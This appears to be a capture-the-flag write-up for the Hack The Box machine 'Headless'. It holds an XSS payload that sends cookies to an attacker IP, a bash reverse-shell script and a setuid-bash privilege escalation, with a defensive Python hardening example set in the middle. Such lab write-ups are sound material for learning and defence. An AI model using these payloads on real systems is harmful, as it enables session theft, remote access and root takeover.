# Headless HTB

There are two ports open:

```
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
```

Checking port 5000, there is a website with a support section that might be susceptible to XSS.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dbdb68731fb97abc2443a32cde0fc8acb505041a%2F73d82d4ecb5068add7298d3a31f8834c.png?alt=media)

Now trying to obtain the cookie: there is a cookie called `is_admin`, but its value is hashed.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ea17a351b653586e6e8193a7b699bc2e52dc125d%2F86e4e5ac5f77610556a32c7906488dfc.png?alt=media)

Running a web server on the attacking host and submitting the following XSS payload through the support form:

```html
<img src=x onerror=fetch('http://10.10.14.37/'+document.cookie);>
```

We get the cookie value:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-f79dc970012092571987417b6f7161befcf36b14%2Fbc95e7a9393251cdae4ee7e38cff04d1.png?alt=media)

Using gobuster, the /dashboard path was discovered.
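The defensive counterpart to the support-form XSS above, as an added example that is not part of the original writeup: the vulnerable handler reflects the message verbatim and issues a script-readable cookie, the hardened one HTML-escapes the message and marks `is_admin` HttpOnly so `document.cookie` can no longer exfiltrate it, and a coarse server-side check flags inline event handlers for alerting. The cookie value is constructed; the handler functions are hypothetical.

```python
import html
import re
from http.cookies import SimpleCookie

# The payload used in the writeup, kept here as the test input.
PAYLOAD = "<img src=x onerror=fetch('http://10.10.14.37/'+document.cookie);>"

def render_message_vulnerable(msg: str) -> str:
    # Verbatim interpolation: the browser parses the <img> tag and runs onerror.
    return f"<p>{msg}</p>"

def render_message_hardened(msg: str) -> str:
    # html.escape turns < > & " ' into entities, so the payload renders as text.
    return f"<p>{html.escape(msg, quote=True)}</p>"

def build_cookie_vulnerable(value: str) -> str:
    # No attributes: the cookie is visible to any script running in the page.
    c = SimpleCookie()
    c["is_admin"] = value
    return c.output(header="").strip()

def build_cookie_hardened(value: str) -> str:
    # HttpOnly hides the cookie from document.cookie; Secure and SameSite
    # limit where it is sent. The XSS itself still needs the escaping above.
    c = SimpleCookie()
    c["is_admin"] = value
    c["is_admin"]["httponly"] = True
    c["is_admin"]["secure"] = True
    c["is_admin"]["samesite"] = "Strict"
    c["is_admin"]["path"] = "/"
    return c.output(header="").strip()

# A tag with an inline event handler attribute (onerror=, onload=, ...).
_EVENT_HANDLER = re.compile(r"<\w[^>]*\son\w+\s*=", re.IGNORECASE)

def looks_like_markup_injection(field: str) -> bool:
    """Server-side check for the support form: returns True when the submitted
    text carries a tag with an inline event handler, so it can be logged."""
    return bool(_EVENT_HANDLER.search(field))

if __name__ == "__main__":
    print(render_message_hardened(PAYLOAD))
    print(build_cookie_hardened("constructed-cookie-value"))
    print(looks_like_markup_injection(PAYLOAD))
```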

Using this cookie we can access /dashboard.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-09caf33e7fc34fe14352fde6ae94a1120fe0ee55%2Fd3a2475335f1cd92780d05443ef21ebf.png?alt=media)

There is command execution here, so we write a shell.sh:

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.37/9005 0>&1
```

Using Burp Suite to intercept the request:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d6751bc8ecb03aeab1fb4990a56b26c8557a4388%2F4108bdd8ee6868856918d0d93df01cfa.png?alt=media)

We get a shell.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d9a73c92746fbf3ce73ffa4854d73eeab58ef8bc%2F8f45c417fadf086fbde0efd39f37c3e3.png?alt=media)

We have sudo privileges over syscheck. Checking the binary with strings:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c4db4ed2b8fc2d52ac64638c8f5b599457a06065%2F81bfce9bb760116a81e11c1521e883b4.png?alt=media)

It calls initdb.sh, so we can add something malicious to initdb.sh:

```bash
echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
```

Now we can run:

```bash
sudo /usr/bin/syscheck
/bin/bash -p
```

And we get a root shell:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7457a3ab0c3bd58bc6cf5877920e68362615e968%2F3cf96077b5fb778e006bd48e3801dcaa.png?alt=media)
